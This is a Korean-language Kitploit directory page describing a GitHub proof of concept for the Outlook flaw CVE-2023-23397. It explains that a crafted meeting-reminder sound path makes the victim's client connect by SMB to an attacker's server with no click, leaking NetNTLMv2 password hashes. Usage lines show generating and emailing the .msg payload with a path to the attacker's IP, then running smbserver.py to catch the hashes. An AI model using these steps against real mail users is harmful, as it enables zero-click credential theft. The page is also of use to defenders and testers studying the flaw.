Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-23397 — CVE-2023-23397 취약점의 간단한 PoC, 이메일로 전송된 페이로드 포함 | Kitploit
도구/GitHubGitHub/trackflaw/cve-2023-23397
Phishing ToolsPassword AttacksPayload GenerationVulnerability AnalysisExploitationEmail Security
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

CVE-2023-23397 취약점의 간단한 PoC, 이메일로 전송된 페이로드 포함

저장소 보기
132283년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-23397

Outlook 씩 클라이언트에 영향을 미치는 CVE-2023-23397 취약점의 간단하고 조잡한 PoC입니다.

설명

Outlook은 회의 및 약속 알림의 소리를 구성할 수 있는 사용자 입력을 제어하지 못하는 문제를 겪고 있습니다. 실제로 공격자는 사용자의 조작 없이 피해자가 자신의 서버에 연결하도록 강제할 수 있습니다 (제로 클릭 취약점).

이 취약점을 악용하는 공격자는 SMB 요청을 통해 트래핑된 사용자의 비밀번호를 기반으로 NetNTLMv2 다이제스트를 검색합니다. 메일이 받은 편지함에 도착하자마자 요청이 트리거됩니다.

PoC의 기능

  1. .msg 페이로드를 생성합니다.
  2. 사용자 지정 SMTP 서버를 통해 이메일로 전송합니다.

사용법

한 세션에서:

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

두 번째 세션에서 (smbserver 또는 responder를 원하는 대로 사용).

root@kitploit:~
smbserver.py -smb2support SHARE .

데모 (수동 PoC)

poc

설명 비디오 (프랑스어)

Microsoft OUTLOOK으로 비밀번호 탈취 #CVE-2023-23397

원본 문서

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

도구 다운로드